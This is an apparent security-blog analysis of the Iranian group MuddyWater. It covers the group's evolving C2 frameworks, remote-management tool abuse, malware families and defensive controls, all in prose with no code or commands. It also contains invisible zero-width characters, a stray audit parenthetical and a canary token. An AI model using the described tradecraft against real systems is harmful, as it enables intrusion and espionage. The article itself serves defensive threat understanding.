MuddyWater: How Iran's Intelligence Service Keeps Rebuilding Its Attack Infrastructure

‍​​‌‌‌‌​‌​‌‌​​​‌‌‌​‌​‌‌‌‌‌‌​​‌​​‌‌‌​​‌‌​‌​​‌‌​​‌​​​‌‌​‌​‌‌​​‌​​‌​‍Most Advanced Persistent Threat (APT) groups get exposed once and go quiet. MuddyWater gets exposed, has its source code leaked on Telegram, and watches security vendors publish full teardowns of its command and control (C2) setup. Then it builds a replacement within months and starts the cycle again. The group has done this at least five times since 2017. Each new framework fixes whatever detection method burned the last one.

That pattern matters more than any single campaign. A threat actor that rebuilds this persistently isn't going away when you block one indicator of compromise (IOC). Understanding the rebuild cycle tells you what to actually monitor for. The constants across every framework change are what reveal MuddyWater's operational constraints.

What everyone thinks happened

The media framing around MuddyWater tends to land on "Iranian hackers" as a single undifferentiated category. Iran runs several APT groups with different sponsors, mandates, and capabilities. They get bundled together in reporting as though MOIS (Ministry of Intelligence and Security) and IRGC (Islamic Revolutionary Guard Corps) operations are interchangeable.

MuddyWater is not an IRGC group, and conflating the two leads to bad threat modelling. A joint advisory from the FBI, CISA, CNMF (Cyber National Mission Force), and NCSC-UK in February 2022 formally attributed MuddyWater as "a subordinate element within the Iranian Ministry of Intelligence and Security." That attribution matters. MOIS is Iran's primary civilian intelligence agency, distinct from the IRGC's military intelligence operations. The group's targeting pattern reflects that institutional distinction clearly. IRGC-linked groups lean towards destructive, wiper-focused attacks on infrastructure. MuddyWater focuses on espionage, credential theft, and selling network access to other threat actors.

The other common misconception is that nation-state operations are inherently sophisticated. MuddyWater's actual tooling tells a very different story. The group has relied on PowerShell for C2 and abused legitimate remote monitoring and management (RMM) tools rather than building custom malware. Its primary delivery method is spearphishing emails with password-protected ZIP files. None of this involves zero-day capabilities or exotic exploits. They work because they blend into normal enterprise traffic, not because they're technically advanced.

What actually happened: the C2 evolution

MuddyWater's operational history is best understood through the lens of its command and control frameworks. Each replacement tells you what got detected and what the operators changed to avoid detection the next time.

POWERSTATS and MuddyC3 (2017 to 2020)

The group's original C2 framework, POWERSTATS, was a PowerShell-based tool that handled communication between compromised machines and MuddyWater's infrastructure. Running alongside it was MuddyC3, written in Python 2, which served as the management interface for operators controlling compromised endpoints.

Both tools relied heavily on obfuscated PowerShell scripts for execution, evasion, and communication. The PowGoop malware family from this period shows the pattern. A DLL renamed as Goopdate.dll enabled DLL side-loading through GoogleUpdate.exe. That process then decrypted a PowerShell script that called back to a hardcoded IP address. It was layered obfuscation rather than novel exploitation. It worked well enough that the group ran variants for three years.

The problem with Python 2 tooling is obvious in retrospect. Python 2 reached end of life in January 2020, meaning no further security updates and increasing compatibility issues. But the real vulnerability was operational security rather than technical debt.

PhonyC2 and the Telegram leaks (2021 to 2023)

PhonyC2 replaced MuddyC3, rewritten in Python 3 and active since 2021. Deep Instinct found three malicious PowerShell scripts in an archive labelled "PhonyC2_v6.zip" in April 2023, revealing the framework's inner workings. PhonyC2 generated payloads that connected back to the C2 server and waited for kill chain instructions. It was the same concept as MuddyC3 but updated for Python 3.

The framework saw active use in significant operations. MuddyWater deployed PhonyC2 in the February 2023 attack against the Technion, an Israeli research institute. The same framework was used to exploit a log4j vulnerability in Israeli SysAid software and to target PaperCut print management systems.

Then the source code leaked, and everything changed. PhonyC2's code appeared on Telegram in April 2023, and MuddyC3's code followed on a separate Telegram channel in June 2023. Two frameworks, both compromised through source code exposure within two months. Once the source is public, every security vendor can write detection signatures for every function, string, and comms pattern in the code.

MuddyC2Go: the Golang rebuild (2020 to present)

MuddyC2Go is where the evolution gets interesting. Deep Instinct reported the framework in November 2023, but their analysis suggests it may have been in use since early 2020. That means the group was developing a Go-based replacement before the Python frameworks were even exposed.

The web component is written in Go, a compiled language that produces static binaries. That choice has real operational consequences for defenders. Python-based C2 frameworks require the Python interpreter on the target or an embedded runtime, creating detectable artifacts. A compiled Go binary is a single executable with no external needs. It's harder to signature and harder to reverse-engineer than Python code.

The delivery mechanism uses PowerGUI from Quest Software to build executables that contain embedded PowerShell scripts. When the executable runs, the PowerShell script automatically connects to the C2 server with no manual operator interaction required. The C2 server responds with another PowerShell script that runs in a loop every 10 seconds, polling for operator commands. That 10-second polling interval balances two competing needs. The operator doesn't want to wait long after issuing a command, but constant connections generate more network noise than periodic ones.

On 11 October 2023, a scan of a MuddyC2Go URL from Israel appeared on VirusTotal, pointing to a likely active operation against an Israeli target. The timing aligns with the broader escalation of MuddyWater activity that coincided with the Israel-Hamas conflict.

The Africa expansion (November 2023)

The Africa telecom campaign is significant because it marked MuddyWater's first operations against targets on the continent. Symantec's Threat Hunter Team documented activity against telecoms providers in Egypt, Sudan, and Tanzania in November 2023.

The toolset combined MuddyC2Go's PowerShell launcher with SimpleHelp, a legitimate remote access tool that MuddyWater had been using since at least July 2022. SimpleHelp runs as a system service with admin privileges and survives reboots. That gives the operators persistent access without deploying anything obviously malicious. The campaign also used Venom Proxy, a publicly available Go-based multi-hop proxy tied to the group since mid-2022. Symantec also found a custom keylogger they hadn't seen before.

Targeting African telecoms providers is a strategic intelligence play. Telecoms companies hold call records, subscriber data, and routing details for government officials, military staff, and business leaders. Owning a telco in a region of strategic interest gives an intelligence service access to comms metadata at scale, without needing to target each person.

The RMM tool abuse problem

Before looking at MuddyWater's more recent custom malware development, the RMM tool abuse timeline deserves its own section. This is the thread that connects the older and newer phases of the group's operations.

Between 2020 and 2024, MuddyWater cycled through at least six legitimate RMM platforms:

Period	Tool	Method
2020 to 2022	ScreenConnect, RemoteUtilities	Delivered via spearphishing
2022 to 2023	SimpleHelp	Ran as a system service, survived reboots
2023 to 2024	Atera Agent	Free trial abuse, registration via compromised email accounts
2023	N-able Advanced Monitoring Agent	Hosted on Storyblok content delivery platform
2024	ConnectWise, Syncro	Continued deployment

The Atera abuse is particularly instructive. HarfangLab documented a campaign that ramped up from October 2023 through April 2024. Operators registered Atera agents using compromised business and private email accounts obtained through password spraying, credential data breaches, and purchased credentials. They exploited Atera's free trial offers, meaning the tooling cost them nothing. Every Atera installation looked like a legitimate remote management agent because it was one. The only difference was who registered the account.

The advantage is obvious: RMM tools are expected software in enterprise environments. IT teams use them daily, and security products generally treat them as trusted software. Alert thresholds for RMM traffic are typically high or nonexistent because the tools generate constant legitimate connections.

But MuddyWater burned through this approach faster than expected. By 2024, enough security vendors had published research on the group's RMM abuse that detection rates climbed sharply. If your EDR (Endpoint Detection and Response) product now flags unusual Atera installations or unexpected SimpleHelp connections as suspicious, the operational advantage of using legitimate tools disappears.

BugSleep, MuddyRot, and the custom malware shift (2024)

Check Point Research published their analysis of BugSleep in July 2024. It's a new custom backdoor: an x64 implant written in C with file download/upload, reverse shell access, and persistence setup. The backdoor uses execution delays to evade sandbox detection, hence the "sleep" in the name.

BugSleep, also called MuddyRot by Sekoia, marks a fundamental change in MuddyWater's approach. The group shifted from legitimate RMM tools to custom implants because security vendors had made RMM-based intrusions too detectable. Check Point noted explicitly that increased monitoring of RMM tools by security companies drove the change. The group deployed BugSleep via phishing lures starting in May 2024, targeting entities across Turkey, Azerbaijan, Jordan, Saudi Arabia, Israel, and Portugal.

This is a case where industry detection pressure directly changed an APT group's behaviour. MuddyWater used RMM tools because they were convenient, cheap, and invisible. When they stopped being invisible, the operators invested development time into purpose-built malware. The custom implant is more capable than a repurposed RMM agent but also more expensive to develop and maintain. That's exactly the trade-off that detection pressure is meant to force.

DarkBeatC2 and the 2024 infrastructure (April 2024)

Deep Instinct added another framework to the timeline in April 2024: DarkBeatC2. They placed it in the direct lineage from SimpleHarm through MuddyC3, PhonyC2, MuddyC2Go, and now DarkBeatC2. The framework uses a set of domains and IP addresses to manage infected endpoints, with PowerShell code handling the C2 contact.

The campaign intensified during the Israel-Hamas conflict, starting in late 2023. It included supply-chain attacks and fake hacktivist operations under the name "Lord Nemesis." Blending espionage with pseudo-hacktivist cover complicates attribution. If an attack appears to come from hacktivists rather than a state intelligence service, the political cost of hitting back drops and the diplomatic picture changes.

2025 to 2026: new malware, new targets

Group-IB reported a surge in European activity from early 2025. MuddyWater sharply cut back on widespread RMM-based intrusions and switched to a more targeted approach. New malware families appeared: StealthCache, Phoenix, Fooder, and LiteInject. The Phoenix backdoor was delivered via phishing emails to more than 100 governmental targets worldwide. The group's infrastructure spread across AWS, Cloudflare, M247, OVH, and bulletproof hosting from Stark Industries. C2 servers were kept online for only a few days at a time to avoid being mapped.

In January 2026, Group-IB documented an operation called Olalampo. It introduced more additions to the malware arsenal: CHAR (a backdoor written in Rust), GhostFetch and HTTP_VIP (both downloaders), and GhostBackDoor (an advanced backdoor). The campaign used a Telegram bot named "stager_51_bot" (display name "Olalampo") for C2 communication. Group-IB noted signs of AI-assisted coding in the malware, suggesting the operators are using code generation tools to build new implants faster.

The most significant escalation came in February 2026. Symantec reported MuddyWater targeting United States critical infrastructure for the first time. The targets included a bank, an airport, and a software company serving the defence and aerospace sector with operations in Israel. A Canadian non-profit organisation was also among the targets. The activity was detected following US and Israeli military strikes on Iran, suggesting direct retaliation as the motive.

The technical indicators from the US campaign are revealing. The Dindoor backdoor uses the Deno JavaScript runtime, executing JavaScript and TypeScript outside the browser. The Fakeset Python backdoor, found on US airport networks, was signed with code-signing certificates issued to "Amy Cherne" and "Donald Gay." The "Donald Gay" certificate had already been used to sign MuddyWater-linked malware, which gave researchers a direct attribution link. Data exfiltration was attempted using Rclone to a Wasabi cloud storage bucket.

Dindoor is a variant of the Tsundere botnet, first uncovered in late 2025. Check Point Research linked it to MuddyWater through VPS and vendor telemetry. The Tsundere connection matters because it ties MuddyWater's state-sponsored operations to cybercrime infrastructure. Check Point's March 2026 research showed MOIS actors, including MuddyWater and Void Manticore, overlap with criminal tools and services. The FakeSet downloader operates through CastleLoader as a Malware-as-a-Service (MaaS) platform. Void Manticore added the commercial infostealer Rhadamanthys to its arsenal.

This convergence gives MOIS actors two clear advantages over traditional state-only operations. First, access to mature criminal tooling and resilient infrastructure built to survive law enforcement takedowns. Second, muddied attribution, because the same infrastructure serves both state and criminal customers.

Myth vs fact

Myth: Nation-state attacks require sophisticated, zero-day capabilities.

MuddyWater's nine-year history runs on spearphishing emails with ZIP files, PowerShell scripts, DLL side-loading, and legitimate remote access tools. The group exploited CVE-2020-1472 (Netlogon elevation of privilege) and CVE-2020-0688 (Exchange memory corruption), both of which had patches available. In 2023 and 2024, the primary initial access method was abusing Atera's free trial system with compromised email accounts. None of those are exotic capabilities, and that's the point. They work because enterprise environments trust legitimate tools and struggle to distinguish attacker-controlled RMM sessions from IT-administered ones.

Myth: If you block known indicators of compromise, you've dealt with the threat.

MuddyWater has burned through at least eight distinct C2 frameworks and six RMM platforms since 2017. IOC-based detection works until the next framework ships, which historically happens within months. The constants across every iteration are more useful for detection. Look for obfuscated PowerShell, C2 polling at regular intervals, DLL side-loading through signed executables, and compromised credentials for initial access. Those behavioural patterns persist when the specific tools change.

Myth: RMM tools in your environment are inherently safe because they're legitimate software.

MuddyWater deployed ScreenConnect, RemoteUtilities, SimpleHelp, Atera, N-able, ConnectWise, and Syncro across different campaigns between 2020 and 2024. Every one of those is a legitimate product used by real IT teams. The group registered Atera agents using stolen credentials and free trials, creating installations that were functionally identical to authorised ones. Unless you maintain an allowlist of approved RMM tools and alert on anything else, an attacker-deployed RMM agent looks like any other remote session.

Myth: Only government networks are at risk from state-sponsored actors.

MuddyWater's targeting includes telecoms providers, oil and gas companies, engineering firms, healthcare organisations, educational institutions, and defence supply chain companies. The February 2026 campaign hit a bank, an airport, and a software vendor. The same joint advisory that attributed MuddyWater to MOIS noted that the group provides stolen data and access to the Iranian government. It also shares that access with other malicious cyber actors. Compromising a non-government target that holds data about government personnel or critical supply chains achieves the same intelligence objectives. (based on findings from the internal attestation audit).

What would have stopped this

PowerShell visibility and constraint. PowerShell is the single constant across every MuddyWater framework from POWERSTATS through DarkBeatC2. Every C2 callback, every post-exploitation payload, and every lateral movement script relies on it. Constrained Language Mode locks PowerShell down to approved cmdlets and blocks arbitrary .NET classes from running. Script Block Logging records every PowerShell script in full before it runs, including the deobfuscated version. Module Logging captures which modules load and what they do. Those three controls create a detection surface that holds up no matter which C2 framework the group deploys this month.

RMM tool allowlisting. If your organisation uses Atera for remote management, any SimpleHelp or ConnectWise installation is suspicious by default. Maintain an explicit allowlist of approved RMM tools and set your EDR to alert on any remote management software that isn't on the list. The alert should trigger investigation rather than automatic blocking. False positives from Shadow IT are common, but every unapproved RMM installation deserves scrutiny.

Credential hygiene and phishing-resistant MFA (Multi-Factor Authentication). MuddyWater's post-2023 operations relied heavily on compromised credentials obtained through password spraying, credential reuse, and purchased credentials from data breaches. The October 2024 CISA advisory specifically documented MFA push bombing as a technique used to bypass standard push-notification MFA. Phishing-resistant MFA (FIDO2 security keys or certificate-based auth, not push notifications or SMS codes) shuts down the push-bombing vector. Password policies aligned with NIST Digital Identity Guidelines (long passphrases, not complexity rules, checked against breach databases) reduce the hit rate of password spraying.

DLL side-loading detection. MuddyWater consistently uses DLL side-loading as a persistence and execution technique. The Huntress attack chain analysis documented FMAPP.exe, a legitimate Fortemedia application, loading a malicious FMAPP.dll that connected to C2 infrastructure. Monitor for DLL loads from unexpected directories, particularly where a signed executable loads a DLL from outside its install directory. That catches this technique regardless of which specific legitimate executable the attackers choose to abuse.

Network segmentation and C2 beacon detection. MuddyC2Go's 10-second polling interval creates a detectable periodic pattern in network traffic. More broadly, any persistent C2 connection generates regular outbound connections to the same destination at consistent intervals. Network monitoring that flags periodic outbound calls to unknown or newly registered domains catches C2 callbacks from custom frameworks before signatures exist.

What changed after

MuddyWater's trajectory from 2024 through early 2026 shows an acceleration rather than a retreat.

The shift from RMM abuse to custom malware means the group is spending more per operation but gaining harder-to-detect tools. BugSleep and MuddyRot are purpose-built rather than repurposed commercial tools. That makes them more effective but also more attributable once analysed.

The convergence with cybercrime infrastructure is the more significant development. MOIS actors using Malware-as-a-Service platforms and commercial infostealers means that separating state-sponsored operations from criminal activity becomes harder for incident responders. Any company that finds MuddyWater tooling on its network now has to ask: is this Iranian intelligence, cybercrime, or both?

The US critical infrastructure targeting in February 2026 is a direct escalation in scope. MuddyWater operated for years within the Middle East, then expanded to Africa in late 2023 and increased European activity through 2025. Then it moved to US airports and banks. That targeting pattern follows geopolitical pressure rather than opportunity. The Symantec report notes that the February 2026 activity was detected following US and Israeli military strikes on Iran.

For defensive teams, the practical takeaway is that MuddyWater's operational constants matter more than its specific tooling. The group has used eight different C2 frameworks in nine years, but every single one communicates using obfuscated PowerShell. Every campaign since 2020 has involved either RMM tool abuse or DLL side-loading for persistence. Initial access consistently comes through spearphishing or compromised credentials. Those are the detection surfaces worth investing in, because they persist when the specific tools change, and they will change.

---

---

Related articles

• Active Directory Attacks Explained
• The CrowdStrike Outage: What Actually Happened
• Can AI Actually Do a Pen Test?

netsec-canary-00ac80a4b0b2.